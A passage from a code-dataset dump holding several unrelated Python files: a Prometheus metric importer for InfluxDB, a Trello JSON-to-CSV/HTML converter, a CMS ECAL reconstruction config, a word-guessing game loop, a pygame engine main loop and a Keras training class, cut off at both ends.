n_constants.ATTR_NOT_SPECIFIED\n\n self._test_create_policy_target(data, expected_value, default_data)\n","sub_path":"gbpservice/neutron/tests/unit/test_extension_group_policy_mapping.py","file_name":"test_extension_group_policy_mapping.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"476706339","text":"# -*- coding: utf-8 -*-\n# Re-import dumped Prometheus metric data (in plain or compressed\n# JSON format) to a local influxdb instance.\n# Imported data will be put into a dedicated (or specified) database\n# for futher analysis.\n\nimport datetime\nimport influxdb\nimport json\nimport logging\nimport os\nimport random\nimport string\nimport zlib\n\nfrom utils import fileopt\nfrom utils import util\n\n\nclass PromDump():\n def __init__(self, args):\n # if db_name, else db_name = prom_dump_`date`\n self.host = args.host if args.host else 'localhost'\n self.port = args.port if args.port else 8086\n self.datadir = args.dir if args.dir else 'data'\n self.db_name = args.db if args.db else self.unique_dbname()\n self.user = args.user\n self.passwd = args.passwd\n\n # unique_dbname() generates a unique database name for importing, to prevents\n # overwritting of previous imported data\n def unique_dbname(self):\n dbname = []\n # universal prefix\n dbname.append('tidb_insight_prom')\n # current time\n dbname.append(datetime.datetime.now().strftime(\"%Y%m%d%H%M\"))\n # a 4 digits random string\n dbname.append(''.join(random.choice(\n string.ascii_lowercase + string.digits) for _ in range(4)))\n\n return '_'.join(dbname)\n\n def load_dump(self):\n def file_list(dir=None):\n f_list = []\n for file in fileopt.list_dir(dir):\n if os.path.isdir(file):\n f_list += file_list(file)\n else:\n f_list.append(file)\n return f_list\n\n for file in file_list(self.datadir):\n if file.endswith('.json'):\n raw = fileopt.read_file(file)\n elif file.endswith('.dat'):\n raw = zlib.decompress(fileopt.read_file(file, 'rb'))\n else:\n logging.debug(\"Skipped unrecorgnized file '%s'\" % file)\n continue\n yield json.loads(raw)\n\n def build_series(self):\n def format_prom_metric(key=None):\n points = []\n point = {'fields': {}}\n # build point header\n for metric in key:\n point['measurement'] = metric['metric']['__name__']\n point['tags'] = {\n 'cluster': self.db_name,\n 'monitor': 'prometheus',\n }\n for k, v in metric['metric'].items():\n point['tags'][k] = v\n # build point values\n for value in metric['values']:\n point['time'] = datetime.datetime.utcfromtimestamp(\n value[0]).strftime('%Y-%m-%dT%H:%M:%SZ')\n try:\n point['fields']['value'] = float(value[1])\n except ValueError:\n point['fields']['value'] = value[1]\n points.append(point.copy())\n return points\n\n for key in self.load_dump():\n yield format_prom_metric(key)\n\n def write2influxdb(self):\n client = influxdb.InfluxDBClient(\n host=self.host, port=self.port, username=self.user, password=self.passwd,\n database=self.db_name, timeout=30)\n # create_database has no effect if the database already exist\n client.create_database(self.db_name)\n logging.info(\"Metrics will be imported to database '%s'.\" %\n self.db_name)\n\n for series in self.build_series():\n try:\n client.write_points(series, batch_size=2000)\n except influxdb.exceptions.InfluxDBClientError as e:\n logging.warn(\n \"Write error for key '%s', data may be empty.\" % series[0]['measurement'])\n logging.debug(e)\n\n def run_importing(self):\n self.write2influxdb()\n","sub_path":"metric/importer/prometheus.py","file_name":"prometheus.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"136130721","text":"#!/usr/bin/env python\r\n\r\nfrom __future__ import print_function\r\nimport os\r\nimport sys\r\nimport json\r\nimport argparse\r\n\r\n\r\nclass Print:\r\n @staticmethod\r\n def stdout(*args, **kwargs):\r\n print(*args, **kwargs)\r\n\r\n @staticmethod\r\n def stderr(*args, **kwargs):\r\n print(*args, file=sys.stderr, **kwargs)\r\n\r\n\r\nclass App:\r\n def __init__(self, json_path):\r\n \"\"\"\r\n :type json_path: str\r\n \"\"\"\r\n self._json_path = json_path\r\n\r\n self._is_csv_output = True\r\n self._is_html_output = False\r\n\r\n self._is_column_view = True\r\n self._is_list_view = False\r\n\r\n self._csv_delimiter = ','\r\n\r\n def set_format(self, output):\r\n \"\"\"\r\n :type output: str\r\n \"\"\"\r\n self._is_csv_output = False\r\n self._is_html_output = False\r\n\r\n if output == 'csv':\r\n self._is_csv_output = True\r\n elif output == 'html':\r\n self._is_html_output = True\r\n else:\r\n self._is_csv_output = True\r\n\r\n def set_view(self, view):\r\n \"\"\"\r\n :type view: str\r\n \"\"\"\r\n self._is_column_view = False\r\n self._is_list_view = False\r\n\r\n if view == 'column':\r\n self._is_column_view = True\r\n elif view == 'list':\r\n self._is_list_view = True\r\n else:\r\n self._is_column_view = True\r\n\r\n def set_csv_delimiter(self, csv_delimiter):\r\n \"\"\"\r\n :type csv_delimiter: str\r\n \"\"\"\r\n self._csv_delimiter = csv_delimiter\r\n\r\n def validate_trello_json(self, json_data):\r\n \"\"\"\r\n :type json_data: dict\r\n :returns: return 0 if validate was success.\r\n :rtype: int\r\n \"\"\"\r\n if 'lists' not in json_data or len(json_data['lists']) == 0:\r\n Print.stderr('JSON data is not valid: lists is empty')\r\n return 1\r\n\r\n for one_list in json_data['lists']: # type: dict\r\n if 'name' not in one_list or 'id' not in one_list:\r\n Print.stderr('JSON data is not valid: list name or id is empty')\r\n return 1\r\n\r\n if 'cards' not in json_data or len(json_data['cards']) == 0:\r\n Print.stderr('JSON data is not valid: cards is empty')\r\n return 1\r\n\r\n for one_card in json_data['cards']: # type: dict\r\n if 'name' not in one_card or 'idList' not in one_card:\r\n Print.stderr('JSON data is not valid: card name or idList is empty')\r\n return 1\r\n return 0\r\n\r\n def _get_row_cards_list(self, json_data):\r\n \"\"\"\r\n :type json_data: dict\r\n :returns: return list (of str) of cards (one row) for column view.\r\n :rtype: list\r\n \"\"\"\r\n cells_list = list()\r\n is_empty = True\r\n for one_list in json_data['lists']: # type: dict\r\n index = 0\r\n card_name = ''\r\n for one_card in json_data['cards']: # type: dict\r\n if one_list['id'] == one_card['idList']:\r\n one_card = json_data['cards'].pop(index)\r\n card_name = one_card['name'].replace('\"', '')\r\n is_empty = False\r\n break\r\n else:\r\n index += 1\r\n cells_list.append(card_name)\r\n\r\n if is_empty:\r\n cells_list = list()\r\n return cells_list\r\n\r\n def _get_cards_list_by_id(self, json_data, list_id):\r\n \"\"\"\r\n :type json_data: dict\r\n :type list_id: str\r\n :returns: return list (of dict) of all cards by selected parent id\r\n :rtype: list\r\n \"\"\"\r\n cards_list = list()\r\n index = 0\r\n while index < len(json_data['cards']):\r\n if list_id == json_data['cards'][index]['idList']:\r\n cards_list.append(json_data['cards'].pop(index))\r\n else:\r\n index += 1\r\n return cards_list\r\n\r\n def _get_card_checklist_by_id(self, json_data, card_id):\r\n \"\"\"\r\n :type json_data: dict\r\n :type card_id: str\r\n :returns: return list (of dict) of card checklist\r\n :rtype: list\r\n \"\"\"\r\n check_list = list()\r\n index = 0\r\n while index < len(json_data['checklists']):\r\n if card_id == json_data['checklists'][index]['idCard']:\r\n check_list.append(json_data['checklists'].pop(index))\r\n else:\r\n index += 1\r\n return check_list\r\n\r\n def _generate_printed_row(self, cells_list):\r\n \"\"\"\r\n :type cells_list: list\r\n :returns: return line to print.\r\n :rtype: str\r\n \"\"\"\r\n printed_row = ''\r\n for one_cell in cells_list: # type: str\r\n if self._is_csv_output:\r\n one_cell = '\"' + one_cell + '\"'\r\n if not printed_row:\r\n printed_row = one_cell\r\n else:\r\n printed_row = printed_row + self._csv_delimiter + one_cell\r\n elif self._is_html_output:\r\n one_cell = '' + one_cell + ''\r\n printed_row = printed_row + one_cell\r\n\r\n if self._is_html_output:\r\n printed_row = '' + printed_row + ''\r\n return printed_row\r\n\r\n def print_column_view(self, json_data):\r\n cells_list = list()\r\n for one_list in json_data['lists']: # type: dict\r\n list_name = one_list['name'].replace('\"', '')\r\n if self._is_html_output:\r\n cells_list.append('' + list_name + '')\r\n else:\r\n cells_list.append(list_name)\r\n printed_row = self._generate_printed_row(cells_list)\r\n\r\n if self._is_html_output:\r\n self._print_html_style()\r\n Print.stdout('')\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n while json_data['cards']:\r\n cells_list = self._get_row_cards_list(json_data)\r\n if cells_list:\r\n printed_row = self._generate_printed_row(cells_list)\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n if self._is_html_output:\r\n Print.stdout('
    ')\r\n\r\n def print_list_view(self, json_data):\r\n # Two column in this view. First is card name, second is card checkitems\r\n if self._is_html_output:\r\n self._print_html_style()\r\n Print.stdout('')\r\n\r\n for one_list in json_data['lists']: # type: dict\r\n cells_list = list()\r\n\r\n list_name = one_list['name'].replace('\"', '')\r\n if self._is_html_output:\r\n cells_list.append('' + list_name + '')\r\n else:\r\n cells_list.append(list_name)\r\n cells_list.append('') # second empty column\r\n printed_row = self._generate_printed_row(cells_list)\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n cards_list = self._get_cards_list_by_id(json_data, one_list['id'])\r\n for one_card in cards_list: # type: dict\r\n check_list = self._get_card_checklist_by_id(json_data, one_card['id'])\r\n check_str = ''\r\n for one_check in check_list: # type: dict\r\n for one_check_item in one_check['checkItems']: # type: dict\r\n check_item_name = one_check_item['name'].replace('\"', '')\r\n if not check_str:\r\n check_str = check_item_name\r\n else:\r\n check_str = check_str + ', ' + check_item_name\r\n\r\n cells_list = list()\r\n card_name = one_card['name'].replace('\"', '')\r\n cells_list.append(card_name)\r\n cells_list.append(check_str)\r\n printed_row = self._generate_printed_row(cells_list)\r\n Print.stdout(printed_row.encode('UTF-8'))\r\n\r\n if self._is_html_output:\r\n Print.stdout('
    ')\r\n\r\n def _print_html_style(self):\r\n Print.stdout('')\r\n Print.stdout('')\r\n Print.stdout('')\r\n Print.stdout('')\r\n Print.stdout('')\r\n\r\n def main(self):\r\n if not os.path.isfile(self._json_path):\r\n Print.stderr('Can\\'t read JSON file (' + self._json_path + ')')\r\n return 1\r\n\r\n json_data = dict()\r\n with open(self._json_path, 'r') as json_file:\r\n try:\r\n json_data = json.load(json_file)\r\n except ValueError:\r\n pass\r\n\r\n if not json_data:\r\n Print.stderr('JSON file is incorrect (' + self._json_path + ')')\r\n return 1\r\n\r\n if self.validate_trello_json(json_data) != 0:\r\n return 1\r\n\r\n if self._is_column_view:\r\n self.print_column_view(json_data)\r\n return 0\r\n if self._is_list_view:\r\n self.print_list_view(json_data)\r\n return 0\r\n return 1\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-o',\r\n '--output',\r\n choices=['csv', 'html'],\r\n dest='output',\r\n help='generate csv or html from json')\r\n parser.add_argument('-v',\r\n '--view',\r\n choices=['column', 'list'],\r\n dest='view',\r\n help='generate column or list view')\r\n parser.add_argument('-d',\r\n '--delimiter',\r\n metavar='',\r\n dest='delimiter',\r\n action=\"store\",\r\n help='set csv delimiter',\r\n default=',')\r\n parser.add_argument(dest='path',\r\n metavar='',\r\n type=str,\r\n help='set json file path')\r\n args = parser.parse_args()\r\n\r\n args.delimiter = args.delimiter.strip()\r\n if len(args.delimiter) != 1:\r\n Print.stderr('Incorrect delimiter')\r\n sys.exit(1)\r\n\r\n app = App(args.path)\r\n\r\n app.set_format(args.output)\r\n app.set_view(args.view)\r\n app.set_csv_delimiter(args.delimiter)\r\n\r\n res = app.main()\r\n sys.exit(res)\r\n","sub_path":"tb_converter.py","file_name":"tb_converter.py","file_ext":"py","file_size_in_byte":10699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"586957733","text":"# \n# run reco\n#\n\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\noptions = VarParsing ('analysis')\noptions.parseArguments()\n\nprocess = cms.Process('PulseTree')\n\n# import of standard configurations\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n)\n\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(10)\n\n#process.TFileService = cms.Service(\"TFileService\",\n #fileName = cms.string(options.outputFile)\n#)\n\nprocess.options = cms.untracked.PSet(\n# SkipEvent = cms.untracked.vstring('ProductNotFound'),\n)\n\n# Production Info\nprocess.configurationMetadata = cms.untracked.PSet(\n annotation = cms.untracked.string('reco nevts:1'),\n name = cms.untracked.string('Applications'),\n version = cms.untracked.string('$Revision: 1.19 $')\n)\n\n# Other statements\nfrom Configuration.AlCa.GlobalTag import GlobalTag\n#process.GlobalTag = GlobalTag(process.GlobalTag, '80X_dataRun2_Prompt_v12', '')\nprocess.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v12', '')\n#102X_upgrade2018_realistic_v12\n\nimport EventFilter.EcalRawToDigi.EcalUnpackerData_cfi\nprocess.ecalDigis = EventFilter.EcalRawToDigi.EcalUnpackerData_cfi.ecalEBunpacker.clone()\nprocess.ecalDigis.DoRegional = False\n\nprocess.ecalDigis.silentMode = False\n\n\n\nmake_collections = ['digis']\nmake_collections.append('rechits')\n\n\nuse_raw_dat = True\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(50)\n\n# -> this was for local runs\n# process.source = cms.Source(\"NewEventStreamFileReader\", fileNames = cms.untracked.vstring(options.inputFiles))\n\n# -> this is the standard one\nprocess.source = cms.Source(\"PoolSource\", fileNames = cms.untracked.vstring(options.inputFiles) )\n\n\n\nprocess.load('RecoLocalCalo.EcalRecProducers.ecalUncalibRecHit_cfi')\nprocess.load('RecoLocalCalo.EcalRecProducers.ecalMultiFitUncalibRecHit_cfi')\nprocess.ecalUncalibRecHit.EBdigiCollection = cms.InputTag(\"ecalDigis\",\"ebDigis\")\nprocess.ecalUncalibRecHit.EEdigiCollection = cms.InputTag(\"ecalDigis\",\"eeDigis\")\nprocess.ecalMultiFitUncalibRecHit.EBdigiCollection = cms.InputTag(\"ecalDigis\",\"ebDigis\")\nprocess.ecalMultiFitUncalibRecHit.EEdigiCollection = cms.InputTag(\"ecalDigis\",\"eeDigis\")\nprocess.ecalMultiFitUncalibRecHit.algoPSet.useLumiInfoRunHeader = cms.bool(False)\n\nprocess.ecalDigis_step = cms.Path(process.ecalDigis)\nprocess.multifit = cms.Path(process.ecalMultiFitUncalibRecHit)\nprocess.weights = cms.Path(process.ecalUncalibRecHit)\n\n\nprocess.RECOSIMoutput = cms.OutputModule(\"PoolOutputModule\",\n dataset = cms.untracked.PSet(\n dataTier = cms.untracked.string(''),\n filterName = cms.untracked.string('')\n ),\n eventAutoFlushCompressedSize = cms.untracked.int32(5242880),\n #fileName = cms.untracked.string('reco_RECO.root'),\n fileName = cms.untracked.string(options.outputFile),\n outputCommands = cms.untracked.vstring(\"keep *\"),\n splitLevel = cms.untracked.int32(0)\n)\n\n\nprocess.endjob_step = cms.EndPath(process.RECOSIMoutput)\n\n#process.schedule = cms.Schedule(process.ecalDigis_step, process.endjob_step)\nprocess.schedule = cms.Schedule(process.ecalDigis_step,process.multifit,process.weights,process.endjob_step)\n\n\n\n","sub_path":"test/reco.py","file_name":"reco.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"323674091","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 4 14:28:56 2019\n\n@author: callu\n\"\"\"\ndef turn(team):\n if (team==0):\n print(\"IT IS YOUR TURN, TEAM RED\\n\")\n num = int(input(\"RED SPYMASTER, how many words are you connecting? \"))\n clue = input(\"RED SPYMASTER, what is your clue?\")\n return (num,clue)\n else:\n print(\"IT IS YOUR TURN, TEAM BLUE\\n\")\n num = int(input(\"BLUE SPYMASTER, how many words are you connecting? \"))\n clue = input(\"BLUE SPYMASTER, what is your clue? \")\n return (num,clue)\n \ndef checkGuess(team, guess, redwords, bluewords, bywords, assassin):\n ass = False\n wrong = False\n if team == 0:\n if (guess.lower()==\"endturn\"):\n print(\"You have ended your turn, RED TEAM\")\n return ass, wrong\n try:\n redwords.index(guess.lower())\n print(\"CORRECT, that was one of your team's words\")\n redwords.remove(guess.lower())\n except:\n if (assassin==guess):\n actual=\"THE ASSASSIN\"\n ass=True\n else:\n try:\n bluewords.index(guess.lower())\n actual=\"one of the BLUE TEAM'S WORDS\"\n bluewords.remove(guess.lower())\n wrong = True\n except:\n try:\n bywords.index(guess.lower())\n actual=\"one of the BYSTANDERS\"\n bywords.remove(guess.lower())\n wrong = True\n except:\n print(\"ERROR\")\n actual = \"ERROR\"\n print(\"INCORRECT, \"+guess+\" was \"+actual)\n return ass, wrong\n else:\n if (guess.lower()==\"endturn\"):\n print(\"You have ended your turn, BLUE TEAM\")\n return ass, wrong\n try:\n bluewords.index(guess.lower())\n print(\"CORRECT, that was one of your team's words\")\n bluewords.remove(guess.lower())\n except:\n if (assassin==guess):\n actual=\"THE ASSASSIN\"\n ass=True\n else:\n try:\n redwords.index(guess.lower())\n actual=\"one of the RED TEAM'S WORDS\"\n redwords.remove(guess.lower())\n wrong = True\n except:\n try:\n bywords.index(guess.lower())\n actual=\"one of the BYSTANDERS\"\n bywords.remove(guess.lower())\n wrong = True\n except:\n print(\"ERROR\")\n actual = \"ERROR\"\n print(\"INCORRECT, \"+guess+\" was \"+actual)\n return ass, wrong\n return ass, wrong\n \ndef win(team):\n if (team==1):\n print(\"BLUE TEAM WINS!!!!\")\n else:\n print(\"RED TEAM WINS!!!!\")\n again = input(\"PLAY AGAIN? Y/N: \")\n if (again.lower()==\"y\"):\n print(\"Setting up another game!\")\n print(\"========================\\n\")\n return True\n else:\n print(\"Thanks for playing!\")\n return False","sub_path":"gameLoopAIPlayer.py","file_name":"gameLoopAIPlayer.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"387645601","text":"\"\"\"\nContains functions used in the ``game.py`` file of a project.\n\"\"\"\n\nimport sys\nfrom os.path import join\nfrom operator import attrgetter\nfrom time import time\n\nimport pygame\nfrom pygame.locals import *\n\nfrom gamebaker import classes, constants\n\n\ndef get_events(blueprints):\n \"\"\"\n Return a set of all the events that have been defined in any ``Blueprint``, and a set of all the doubletap events.\n \n Events that haven't been defined will not be called to save time.\n ``blueprints`` should be the module containing the game's blueprints.\n \"\"\"\n events = set()\n for variable in vars(blueprints).values():\n try:\n if issubclass(variable, blueprints.Blueprint) and variable != blueprints.Blueprint: \n for key, value in vars(variable).items():\n if callable(value):\n events.add(key)\n except TypeError:\n continue\n return (events & classes.events, events & classes.doubletap_events)\n\ndef load_level(level_list, number):\n \"\"\"\n Load a level given a list of ``Level`` objects and an index, and return a tuple of the views and objects of that level.\n \"\"\"\n views = list(level_list[number].views)\n objects = list(level_list[number].objects)\n scenery = list(level_list[number].scenery)\n level = level_list[number]\n objects.sort(key=attrgetter(\"draw_depth\"))\n scenery.sort(key=attrgetter(\"draw_depth\"))\n \n return (views, objects, scenery, level)\n \ndef draw_objects(objects, views, window):\n \"\"\"\n Draw objects to views, and those views to a window.\n \"\"\"\n window.fill((0, 0, 0))\n for v in views:\n v.surface.fill((0, 0, 0))\n for a in objects:\n v.surface.blit(a.sprite.image, (a.x - v.x, a.y - v.y))\n window.blit(v.surface, (v.screen_x, v.screen_y))\n \n \nclass EventContainer:\n \"\"\"\n Represent an event and data pertaining to it.\n \"\"\"\n def _attrs(self):\n \"\"\"\n Returns a tuple containing the attributes of an instance used for hashing and equality checking.\n Should be overridden by subclasses.\n \"\"\"\n return ()\n \n def __eq__(self, other):\n return type(self) == type(other) and all(a == b for a, b in zip(self._attrs(), other._attrs()))\n\n def __hash__(self):\n return hash(self._attrs())\n\nclass KeyEventWithoutData(EventContainer):\n def __init__(self, name):\n self.name = name\n \n def _attrs(self):\n return (self.name,)\n \n def __repr__(self):\n return \"KeyEventWithoutData({})\".format(repr(self.name))\n \nclass KeyEventWithData(EventContainer):\n def __init__(self, name, data):\n self.name = name\n self.data = data\n \n def _attrs(self):\n return (self.name, self.data)\n \n def __repr__(self):\n return \"KeyEventAndData({}, {})\".format(repr(self.name), repr(self.data))\n \nclass DoubleTapEvent(EventContainer):\n def __init__(self, key_event, time):\n self.key_event = key_event\n self.time = time\n\n def _attrs(self):\n return (self.key_event, self.time)\n \n def __repr__(self):\n return \"DoubleTapEvent({}, {})\".format(repr(self.key_event), repr(self.time))\n\ndef try_event(instance, event, *args, **kwargs):\n \"\"\"\n Check if an instance as a method defined for an event, and call it if it does.\n \"\"\"\n if hasattr(instance, event):\n return getattr(instance, event)(*args, **kwargs)\n \ndef check_possible_collision(first, second, blueprints):\n \"\"\"\n Checks if ``second`` is in ``first.possible_collisions``, or vice versa.\n \"\"\"\n return (type(first), type(second) in blueprints.possible_collisions)\n\n \ndef key_method_args(key):\n \"\"\"\n Return the method name used by blueprints to refer to a Pygame key event, and possibly arguments to be passed to a relevant Blueprint instance's event.\n \"\"\"\n if key in constants.key_constants1:\n return KeyEventWithoutData(constants.key_constants1[key])\n else:\n for group in constants.key_constants2:\n if key in group:\n method_name = constants.key_constants2[group]\n if method_name == \"key_letter\":\n return KeyEventWithData(method_name, chr(key))\n elif method_name == \"key_numberpad\":\n return KeyEventWithData(method_name, key-256) # pygame.K_KPx -> x\n elif method_name == \"key_number\":\n return KeyEventWithData(method_name, key-48) # pygame.K_x -> x\n elif method_name == \"key_function\":\n return KeyEventWithData(method_name, key-281) # pygame.K_Fx -> x\n else:\n return KeyEventWithoutData(method_name)\n else:\n return KeyEventWithData(\"key_unknown\")\n\ndef call_key_method(instance, method, suffix):\n \"\"\"\n Calls a key related method on an instance.\n \"\"\"\n if type(method) == KeyEventWithoutData:\n try_event(instance, method.name + suffix)\n elif type(method) == KeyEventWithData:\n try_event(instance, method.name + suffix, method.data)\n\n \ndef get_active_things(views, thing_grid):\n return list(set.union(*[thing_grid.select_region(v.x, v.y, v.width, v.height) for v in views])) \n \ndef sort_stuff(active_instances, active_scenery):\n return sorted(active_instances + active_scenery, key=attrgetter(\"draw_depth\"))\n \ndef main(events, views, objects, scenery, settings, blueprints, level):\n \"\"\"\n Set up the game and run the game loop.\n \"\"\"\n pygame.init()\n \n events, doubletap_events = events\n \n cpcs = check_possible_collision # local variable for speed\n \n game_name = settings.game_name\n game_version = settings.game_version\n window_caption = \"{} - {}\".format(game_name, game_version)\n window_width = settings.window_width\n window_height = settings.window_height\n game_speed = settings.game_speed\n active_count = settings.active_count\n\n window = pygame.display.set_mode((window_width, window_height))\n pygame.display.set_caption(window_caption)\n\n game_clock = pygame.time.Clock()\n \n key_held_events = set()\n key_doubletap_possibles = set()\n \n objects_grid = classes.Grid(objects, level.width, level.height, settings.sector_size)\n classes.Blueprint.grid = objects_grid\n \n scenery_grid = classes.Grid(scenery, level.width, level.height, settings.sector_size)\n classes.Scenery.grid = scenery_grid\n \n counter = 0\n \n while True:\n key_doubletap_events = set()\n key_press_events = set()\n key_release_events = set()\n \n mouse_events = set()\n \n mouse_x, mouse_y = pygame.mouse.get_pos()\n mouse_x += views[0].x\n mouse_y += views[0].y\n blueprints.variables.mouse_x, blueprints.variables.mouse_y = mouse_x, mouse_y\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYUP:\n method = key_method_args(event.key)\n if method.name + \"_release\" in events:\n key_release_events.add(method)\n key_held_events.discard(method)\n elif event.type == pygame.KEYDOWN:\n method = key_method_args(event.key)\n if method.name + \"_press\" in events:\n key_press_events.add(method)\n if method.name + \"_held\" in events:\n key_held_events.add(method)\n if method.name + \"_doubletap\" in doubletap_events:\n t = time()\n for e in key_doubletap_possibles:\n if t - e.time <= 0.3: # if it was less than 0.3 seconds ago\n key_doubletap_events.add(e.key_event)\n key_doubletap_possibles.discard(e)\n break\n else:\n key_doubletap_possibles.add(DoubleTapEvent(method, time()))\n \n for v in views:\n v.update_variables()\n \n counter -= 1\n if counter <= 0:\n active_instances = get_active_things(views, objects_grid)\n active_scenery = get_active_things(views, scenery_grid)\n counter = active_count\n\n things_to_draw = sort_stuff(active_instances, active_scenery)\n draw_objects(things_to_draw, views, window)\n \n blueprints.variables.views = views\n \n for instance in active_instances:\n instance.tick()\n for method in key_press_events:\n call_key_method(instance, method, \"_press\")\n for method in key_release_events:\n call_key_method(instance, method, \"_release\")\n for method in key_held_events:\n call_key_method(instance, method, \"_held\")\n for method in key_doubletap_events:\n call_key_method(instance, method, \"_doubletap\")\n \n collision_list = sorted(active_instances, key=attrgetter(\"x\"))\n for index, instance in enumerate(collision_list):\n temp_x = instance.x # avoid constant attrgetting\n bbw = instance.bounding_box_width\n for second_instance in collision_list[index+1:]:\n if temp_x + bbw < second_instance.x:\n break\n elif cpcs(instance, second_instance, blueprints) and instance.get_rect().colliderect(second_instance.get_rect()):\n try_event(instance, \"collide\", second_instance)\n try_event(second_instance, \"collide\", instance)\n \n for instance in active_instances:\n instance.end_tick() \n \n views = blueprints.variables.views\n \n # set the caption\n if game_version.build_type != \"r\": # r for release\n window_caption = \"{} - {} - {} fps\".format(game_name, game_version, game_clock.get_fps())\n pygame.display.set_caption(window_caption)\n \n pygame.display.flip() \n \n game_clock.tick(game_speed)","sub_path":"gamebaker/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"553412601","text":"\nfrom base.base_trainer import BaseTrain\nimport sys, os, psutil, math\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping\nimport collections # for flatten() TODO: make a utility libr for flatten, etc.\n\ndef flatten(d, parent_key='', sep='_'):\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(v, collections.MutableMapping):\n items.extend(flatten(v, new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\nclass SimpleMnistModelTrainerWGenerator(BaseTrain):\n def __init__(self, model, train_generator, config, valid_data=None):\n super(SimpleMnistModelTrainerWGenerator, self).__init__(model,\n train_generator, config, valid_data)\n # self.train_generator = train_generator\n # self.validation_generator = valid_data\n self.callbacks = []\n self.loss = []\n self.acc = []\n self.val_loss = []\n self.val_acc = []\n self.init_callbacks()\n\n\n\n def init_callbacks(self):\n # TODO: figure out LearningRateScheduler callback with polydecay maybe\n # TODO: early stopping callback\n self.callbacks.append(\n ModelCheckpoint(\n filepath=os.path.join(self.config.callbacks.checkpoint_dir,\n '%s-{epoch:02d}-{val_loss:.2f}.hdf5' % self.config.exp.name),\n monitor=self.config.callbacks.checkpoint_monitor,\n mode=self.config.callbacks.checkpoint_mode,\n save_best_only=self.config.callbacks.checkpoint_save_best_only,\n save_weights_only=self.config.callbacks.checkpoint_save_weights_only,\n verbose=self.config.callbacks.checkpoint_verbose,\n )\n )\n\n self.callbacks.append(\n TensorBoard(\n log_dir=self.config.callbacks.tensorboard_log_dir,\n write_graph=self.config.callbacks.tensorboard_write_graph,\n )\n )\n\n self.callbacks.append(\n EarlyStopping(\n monitor=self.config.callbacks.early_stopping_monitor,\n min_delta=self.config.callbacks.early_stopping_min_delta,\n patience=self.config.callbacks.early_stopping_patience,\n verbose=self.config.callbacks.early_stopping_patience\n )\n )\n\n # if the config has the debug flag on, turn on tfdbg (TODO: make it work)\n if hasattr(self.config,\"debug\"):\n if (self.config.debug == True):\n import keras.backend\n from tensorflow.python import debug as tf_debug\n print(\"#=========== DEBUG MODE ===========#\")\n sess = keras.backend.get_session()\n sess = tf_debug.LocalCLIDebugWrapperSession(sess)\n keras.backend.set_session(sess)\n\n # if the config file has a comet_ml key, log on comet\n if hasattr(self.config,\"comet_api_key\"):\n #from comet_ml import Experiment # PUT the import in main\n #experiment = Experiment(api_key=self.config.exp.comet_api_key,\n # project_name=self.config.exp.name)\n #experiment.disable_mp()\n self.config.exp_handle.log_multiple_params(flatten(self.config.toDict()))\n self.callbacks.append(self.config.exp_handle.get_keras_callback())\n\n def train(self):\n\n # TODO: fix this it's now here just for future sanity\n # (somehow split the incoming data?)\n if (self.valid_data==None):\n print(\"\"\"Need some validation data or the\n ModelCheckpoint won't be saved\"\"\")\n return\n\n history = self.model.fit_generator(\n generator=self.data,\n epochs=self.config.trainer.num_epochs,\n # steps_per_epoch=int(math.ceil(34564/float(self.config.trainer.batch_size))),\n # 34564 math.ceil(len(os.listdir(self.config.data_loader.train_dir))\\\n # / float(self.config.trainer.batch_size)), # WILL USE __len__() if left\n verbose=self.config.trainer.verbose_training,\n validation_data=self.valid_data,\n # validation_steps=int(math.ceil(8640/float(self.config.trainer.batch_size))),\n # math.ceil(len(os.listdir(self.config.data_loader.test_dir))\\\n # / float(self.config.trainer.batch_size)),\n callbacks=self.callbacks,\n use_multiprocessing=True,\n workers=psutil.cpu_count(),\n # max_queue_size=20,\n shuffle=True\n )\n\n self.loss.extend(history.history['loss'])\n self.acc.extend(history.history['acc'])\n self.val_loss.extend(history.history['val_loss'])\n self.val_acc.extend(history.history['val_acc'])\n","sub_path":"trainers/simple_mnist_trainer_w_generator.py","file_name":"simple_mnist_trainer_w_generator.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"52769143","text":"from torch import randn\nfrom torch.nn import MaxPool2d\n\nfrom backpack import extend\n\n\ndef data(device=\"cpu\"):\n N, C, 